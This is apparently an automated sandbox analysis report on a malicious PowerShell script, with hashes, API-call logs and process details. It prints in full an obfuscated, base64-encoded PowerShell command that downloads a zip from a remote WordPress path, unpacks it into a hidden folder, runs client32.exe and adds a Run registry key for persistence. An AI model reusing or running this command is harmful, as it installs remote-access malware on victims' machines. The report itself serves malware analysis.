Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 28, 2023, 5:09 p.m.	April 28, 2023, 5:13 p.m.

Size	4.8KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`f5e06be9bc58695ff043f1d9465fb519`
SHA256	`6d5447309aa65dbb479d8094d7576aed61a53225291445d34daea4c108af3440`
CRC32	`2804C2DA`
ssdeep	`48:i/1iHsU3uuSHShfM9qh34L0+QUvfcPB5z4OfUXmWcAePXhXdrycrX/oRSp52Mbqe:QVLSii3exrm5psczp5XCRnsDo3TWmhG`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\locals.ps1
508
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBFAE4AYABWADoAYQBQAGAAcABEAGAAQQBUAGEAfQA7ACAAJAB7AEwAYABJAE4AawB9AD0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsAMQAwAH0AewA4AH0AewA1AH0AewAzAH0AewA5AH0AewA3AH0AewA2AH0AewAxADEAfQAiACAALQBmACAAJwBwACcALAAnAHIAZQBzACcALAAnAHMAOgAvAC8AJwAsACcAaQAnACwAJwBoAHQAdABwACcALAAnAGUAbgB0AC8AcABsAHUAZwAnACwAJwBnAGkAdgAnACwAJwBzAC8AJwAsACcAbwBuAHQAJwAsACcAbgAnACwAJwByAG8ALgBpAGQALwB3AHAALQBjACcALAAnAGUAbQBlAC4AcABoAHAAJwApADsAIAAkAHsAcgBuAGAAVQBNAH0APQAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBuAGQAJwAsACcAbwBtACcALAAnAEcAZQB0AC0AUgAnACkAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAB7AHIAYABSAG4AYABVAE0AfQA9ACYAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBSAGEAbgBkACcALAAnAG8AbQAnACwAJwAtACcALAAnAEcAZQB0ACcAKQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAHsAQwBIAGAAUgBzAH0APQAoACIAewA4AH0AewA5AH0AewA2AH0AewAyAH0AewAxADAAfQB7ADEAMQB9AHsAMQAyAH0AewAwAH0AewAxADQAfQB7ADQAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsANwB9AHsAMQB9ACIAIAAtAGYAIAAnAEQAJwAsACcAUABSAFMAVABVAFYAVwBYAFkAWgAnACwAJwBwAHMAdAB1AHYAdwAnACwAJwBLAEwATQAnACwAJwBGACcALAAnAEoAJwAsACcAbQBuAG8AJwAsACcATgBPACcALAAnAGEAYgBjAGQAZQBmAGcAaABpACcALAAnAGoAawBsACcALAAnAHgAJwAsACcAeQB6ACcALAAnAEEAQgBDACcALAAnAEcASABJACcALAAnAEUAJwApADsAIAAkAHsAUgBgAFMAVABSAH0APQAnACcAOwAgACQAewByAGAAQQBuAH0APQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcATgBlAHcALQBPACcALAAnAGIAagBlACcALAAnAGMAJwAsACcAdAAnACkAIAAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAG0ALgBSAGEAJwAsACcAUwB5AHMAdABlACcALAAnAG0AJwAsACcAbgBkAG8AJwApADsAIABmAG8AcgAgACgAJAB7AGkAfQA9ADAAOwAgACQAewBpAH0AIAAtAGwAdAAgACQAewByAGAATgB1AE0AfQA7ACAAJAB7AEkAfQArACsAKQAgAHsAJAB7AHIAcwBgAFQAUgB9ACsAPQAkAHsAYwBgAGgAUgBzAH0AWwAkAHsAcgBgAEEAbgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB4ACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAwACwAIAAkAHsAQwBoAGAAUgBTAH0ALgAiAEwARQBuAEcAYABUAGgAIgApAF0AfQA7ACAAJAB7AFIAWgBgAGkAcAB9AD0AJAB7AHIAcwBgAFQAUgB9ACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwB6AGkAcAAnACkAOwAgACQAewBQAGAAQQB0AGgAfQA9ACQAewBFAG4AVgA6AGAAQQBwAFAAYABEAEEAVABBAH0AKwAnAFwAJwArACQAewBSAGAAWgBpAHAAfQA7ACAAJAB7AFAAegBgAGkAcAB9AD0AJAB7AEUAbgBgAFYAOgBBAGAAcABQAGQAQQBgAFQAYQB9ACsAKAAoACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdQBwAGQAJwAsACcATgAwAFQARQAnACwAJwBOAEUAJwAsACcAYQB0AGUAXwAnACwAJwBRAHQAUwBPACcAKQApAC4AIgBSAGUAcABgAEwAYQBgAGMAZQAiACgAJwBRAHQAUwAnACwAWwBTAFQAUgBpAE4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKwAkAHsAUgByAGAATgBgAFUAbQB9ADsAIAAuACgAIgB7ADQAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADIAfQAiAC0AZgAgACcAdABhAHIAdAAnACwAJwAtACcALAAnAHIAJwAsACcAQgBpAHQAcwBUAHIAJwAsACcAUwAnACwAJwBhAG4AcwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAQQBgAFQAaAB9ADsAIAAmACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAHYAJwAsACcAZQAnACwAJwBoAGkAJwAsACcAZQB4AHAAYQBuAGQALQBhAHIAYwAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABhAGAAVABIAH0AIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJAB7AFAAWgBgAGkAcAB9ADsAIAAkAHsAZgBgAE8ATABkAH0APQAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAFoAYABJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsAZgBvAGAAbABEAH0ALgAiAGEAYABUAHQAcgBgAGkAQgBgAFUAdABlAFMAIgA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBIAGkAZABkAGUAJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACcAZQBtAG8AdgBlAC0AJwAsACcAUgAnACwAJwBlAG0AJwAsACcASQB0ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGAAQQB0AEgAfQA7ACAAJgAoACcAYwBkACcAKQAgACQAewBQAHoAYABJAFAAfQA7ACAAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHMAdABhAHIAJwAsACcAdAAnACkAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnADIALgAnACwAJwBjAGwAaQBlAG4AdAAzACcAKQA7ACAAJAB7AGYAYABzAFQAUgB9AD0AJAB7AHAAYABaAEkAcAB9ACsAKAAoACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBxAEwAbwBjAGwAaQBlAG4AJwAsACcAdAAzACcALAAnAC4AZQB4AGUAJwAsACcAMgAnACkAKQAtAEMAcgBlAFAAbABhAGMAZQAgACAAKABbAGMASABhAFIAXQAxADEAMwArAFsAYwBIAGEAUgBdADcANgArAFsAYwBIAGEAUgBdADEAMQAxACkALABbAGMASABhAFIAXQA5ADIAKQA7ACAAJAB7AHIAYABOAE0AfQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHAAZABhAHQAJwAsACcATwBOAEUATgAwAFQARQB1ACcALAAnAGUAXwAnACkAKwAkAHsAUgBgAFIATgBgAFUATQB9ADsAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdAAnACwAJwBlAHcALQAnACwAJwBOACcALAAnAGUAbQBQAHIAbwBwAGUAcgB0AHkAJwAsACcASQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsANQB9AHsAMwB9AHsAMQB9AHsANwB9AHsAOQB9AHsAMQAxAH0AewAyAH0AewA4AH0AewAxADAAfQB7ADQAfQB7ADAAfQB7ADYAfQAiACAALQBmACAAJwAwAH0AUgAnACwAJwBDAFUAOgB7ADAAfQBTACcALAAnAG8AZgB0AHsAMAB9AFcAaQBuAGQAbwB3ACcALAAnAEsAJwAsACcAZQByAHMAaQBvAG4AewAnACwAJwBIACcALAAnAHUAbgAnACwAJwBPAEYAVABXAEEAUgBFAHsAMAB9AE0AaQBjACcALAAnAHMAewAwAH0AQwB1AHIAcgBlACcALAAnAHIAJwAsACcAbgB0AFYAJwAsACcAbwBzACcAKQApAC0AZgAgAFsAQwBIAGEAcgBdADkAMgApACAALQBOAGEAbQBlACAAJAB7AFIAYABOAE0AfQAgAC0AVgBhAGwAdQBlACAAJAB7AGYAcwBgAFQAUgB9ACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAByAGkAJwAsACcAbgBnACcAKQA7AA==
  2156

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 28, 2023, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:08 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 28, 2023, 5:08 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 28, 2023, 5:08 p.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f3cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2023, 5:08 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (24 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 508 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02670000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02791000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:08 p.m.	process_identifier: 2156 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBFAE4AYABWADoAYQBQAGAAcABEAGAAQQBUAGEAfQA7ACAAJAB7AEwAYABJAE4AawB9AD0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsAMQAwAH0AewA4AH0AewA1AH0AewAzAH0AewA5AH0AewA3AH0AewA2AH0AewAxADEAfQAiACAALQBmACAAJwBwACcALAAnAHIAZQBzACcALAAnAHMAOgAvAC8AJwAsACcAaQAnACwAJwBoAHQAdABwACcALAAnAGUAbgB0AC8AcABsAHUAZwAnACwAJwBnAGkAdgAnACwAJwBzAC8AJwAsACcAbwBuAHQAJwAsACcAbgAnACwAJwByAG8ALgBpAGQALwB3AHAALQBjACcALAAnAGUAbQBlAC4AcABoAHAAJwApADsAIAAkAHsAcgBuAGAAVQBNAH0APQAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBuAGQAJwAsACcAbwBtACcALAAnAEcAZQB0AC0AUgAnACkAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAB7AHIAYABSAG4AYABVAE0AfQA9ACYAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBSAGEAbgBkACcALAAnAG8AbQAnACwAJwAtACcALAAnAEcAZQB0ACcAKQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAHsAQwBIAGAAUgBzAH0APQAoACIAewA4AH0AewA5AH0AewA2AH0AewAyAH0AewAxADAAfQB7ADEAMQB9AHsAMQAyAH0AewAwAH0AewAxADQAfQB7ADQAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsANwB9AHsAMQB9ACIAIAAtAGYAIAAnAEQAJwAsACcAUABSAFMAVABVAFYAVwBYAFkAWgAnACwAJwBwAHMAdAB1AHYAdwAnACwAJwBLAEwATQAnACwAJwBGACcALAAnAEoAJwAsACcAbQBuAG8AJwAsACcATgBPACcALAAnAGEAYgBjAGQAZQBmAGcAaABpACcALAAnAGoAawBsACcALAAnAHgAJwAsACcAeQB6ACcALAAnAEEAQgBDACcALAAnAEcASABJACcALAAnAEUAJwApADsAIAAkAHsAUgBgAFMAVABSAH0APQAnACcAOwAgACQAewByAGAAQQBuAH0APQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcATgBlAHcALQBPACcALAAnAGIAagBlACcALAAnAGMAJwAsACcAdAAnACkAIAAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAG0ALgBSAGEAJwAsACcAUwB5AHMAdABlACcALAAnAG0AJwAsACcAbgBkAG8AJwApADsAIABmAG8AcgAgACgAJAB7AGkAfQA9ADAAOwAgACQAewBpAH0AIAAtAGwAdAAgACQAewByAGAATgB1AE0AfQA7ACAAJAB7AEkAfQArACsAKQAgAHsAJAB7AHIAcwBgAFQAUgB9ACsAPQAkAHsAYwBgAGgAUgBzAH0AWwAkAHsAcgBgAEEAbgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB4ACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAwACwAIAAkAHsAQwBoAGAAUgBTAH0ALgAiAEwARQBuAEcAYABUAGgAIgApAF0AfQA7ACAAJAB7AFIAWgBgAGkAcAB9AD0AJAB7AHIAcwBgAFQAUgB9ACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwB6AGkAcAAnACkAOwAgACQAewBQAGAAQQB0AGgAfQA9ACQAewBFAG4AVgA6AGAAQQBwAFAAYABEAEEAVABBAH0AKwAnAFwAJwArACQAewBSAGAAWgBpAHAAfQA7ACAAJAB7AFAAegBgAGkAcAB9AD0AJAB7AEUAbgBgAFYAOgBBAGAAcABQAGQAQQBgAFQAYQB9ACsAKAAoACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdQBwAGQAJwAsACcATgAwAFQARQAnACwAJwBOAEUAJwAsACcAYQB0AGUAXwAnACwAJwBRAHQAUwBPACcAKQApAC4AIgBSAGUAcABgAEwAYQBgAGMAZQAiACgAJwBRAHQAUwAnACwAWwBTAFQAUgBpAE4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKwAkAHsAUgByAGAATgBgAFUAbQB9ADsAIAAuACgAIgB7ADQAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADIAfQAiAC0AZgAgACcAdABhAHIAdAAnACwAJwAtACcALAAnAHIAJwAsACcAQgBpAHQAcwBUAHIAJwAsACcAUwAnACwAJwBhAG4AcwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAQQBgAFQAaAB9ADsAIAAmACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAHYAJwAsACcAZQAnACwAJwBoAGkAJwAsACcAZQB4AHAAYQBuAGQALQBhAHIAYwAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABhAGAAVABIAH0AIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJAB7AFAAWgBgAGkAcAB9ADsAIAAkAHsAZgBgAE8ATABkAH0APQAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAFoAYABJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsAZgBvAGAAbABEAH0ALgAiAGEAYABUAHQAcgBgAGkAQgBgAFUAdABlAFMAIgA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBIAGkAZABkAGUAJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACcAZQBtAG8AdgBlAC0AJwAsACcAUgAnACwAJwBlAG0AJwAsACcASQB0ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGAAQQB0AEgAfQA7ACAAJgAoACcAYwBkACcAKQAgACQAewBQAHoAYABJAFAAfQA7ACAAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHMAdABhAHIAJwAsACcAdAAnACkAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnADIALgAnACwAJwBjAGwAaQBlAG4AdAAzACcAKQA7ACAAJAB7AGYAYABzAFQAUgB9AD0AJAB7AHAAYABaAEkAcAB9ACsAKAAoACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBxAEwAbwBjAGwAaQBlAG4AJwAsACcAdAAzACcALAAnAC4AZQB4AGUAJwAsACcAMgAnACkAKQAtAEMAcgBlAFAAbABhAGMAZQAgACAAKABbAGMASABhAFIAXQAxADEAMwArAFsAYwBIAGEAUgBdADcANgArAFsAYwBIAGEAUgBdADEAMQAxACkALABbAGMASABhAFIAXQA5ADIAKQA7ACAAJAB7AHIAYABOAE0AfQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHAAZABhAHQAJwAsACcATwBOAEUATgAwAFQARQB1ACcALAAnAGUAXwAnACkAKwAkAHsAUgBgAFIATgBgAFUATQB9ADsAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdAAnACwAJwBlAHcALQAnACwAJwBOACcALAAnAGUAbQBQAHIAbwBwAGUAcgB0AHkAJwAsACcASQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsANQB9AHsAMwB9AHsAMQB9AHsANwB9AHsAOQB9AHsAMQAxAH0AewAyAH0AewA4AH0AewAxADAAfQB7ADQAf